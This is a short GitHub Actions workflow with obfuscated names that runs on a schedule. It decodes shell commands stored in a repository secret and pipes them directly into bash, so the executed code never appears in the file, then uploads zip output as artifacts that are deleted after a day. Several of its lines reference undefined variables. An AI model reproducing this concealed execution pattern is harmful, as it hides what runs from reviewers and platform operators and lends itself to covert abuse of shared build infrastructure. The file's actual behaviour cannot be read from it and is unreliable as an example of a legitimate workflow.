name: xilvyangkai
on:
  workflow_dispatch:

  schedule:
    - cron: '28 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xilvyangkai
        env:
          akiy4: ${{ secrets.akiy4 }}
        run: |
          printf '%s' "$akiy4" | jq -r .z33939 | /bin/bash
          printf '%s' "$hxhfh871" | jq -r .z519 | /bin/bash
          printf '%s' "$enee42341" | jq -r .s624 | /bin/bash
          printf '%s' "$lnnrf4" | jq -r .x7752 | /bin/bash
          printf '%s' "$rqhtn4800" | jq -r .isk598 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: xFQd8WM8
          path: "*.zip"
          retention-days: 1
